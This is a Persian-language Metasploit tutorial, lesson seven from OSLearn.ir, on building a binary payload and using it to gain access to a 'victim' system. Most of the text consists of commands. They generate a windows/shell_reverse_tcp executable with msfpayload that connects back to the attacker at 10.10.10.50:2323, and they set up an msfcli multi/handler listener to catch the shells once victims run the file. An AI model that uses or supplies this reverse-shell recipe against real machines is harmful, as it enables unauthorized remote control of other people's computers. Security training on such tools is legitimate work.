با سلام خدمت کاربران گرامی . جلسه ی هفتم از آموزش های متااسپلویت را در پیش رو داریم . همان طور که از عنوان مشخص است امروز در مورد ساخت پیلودی باینری صحبت خواهیم کرد و در آخر نحوه ی دسترسی گرفتن از سیستم قربانی را با استفاده از همین فایل بررسی خواهیم کرد .
لازم به ذکر است که در اکثر آموزش ها فایلی باینتری و با پسوند exe ساخته می شود اما این به این معنا نیست که فقط پیلود ما از جنس باینری می تواند باشد ! برای درک بیش تر این موضوع و هم چنین دیدن بقیه ی فرمت های موجود به شکل زیر عمل می کنیم :
root@kali:~# msfpayload -h
اما برای مشاهده ی جزییات و option های موجود بر روی پیلود خود ابتدا به شکل زیر عمل می کنیم :
root@kali:# msfpayload windows/shell_reverse_tcp O
نکته : همانند msfcli از حرف بزرگ O برای نمایش option های این payload استفاده کرده ایم .
همان طور که مشاهده می کنید هر سه مقدار lport و lhost و exitfunc باید تعیین شود که دو مقدار lport و exitfunc مقادیری پیش فرض دارند . پس لازم است هر کدام از این مقدار را متناسب با شرایط خودمون تعیین کنیم . به عنوان مثال :
root@kali:# msfpayload windows/shell_reverse_tcp LHOST=10.10.10.50 LPORT=2323 O
حال کافیست این تنظیمات را در قالب یک فایل باینری با پسوند exe تهیه کنیم . به شکل زیر :
root@kali:# msfpayload windows/shell_reverse_tcp LHOST=10.10.10.50 LPORT=2323 X > /root/OSLearn.exe
فایل مخرب ساخته شد ! در مرحله ی بعد باید روی پورت 2323 اصطلاحا روی حالت listen قرار بگیریم تا قربانی ها بعد از اجرای این فایل به سیستم ما متصل شوند .
برای این منظور با استفاده از msfcli که در قسمت های قبلی یادگرفتیم , به شکل زیر عمل می کنیم :
root@kali:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.10.10.50 LPORT=2323 E
موفق و موید باشید .
منبع : او اس لرن دات آی آر | http://OSLearn.ir
نویسنده : E2MA3N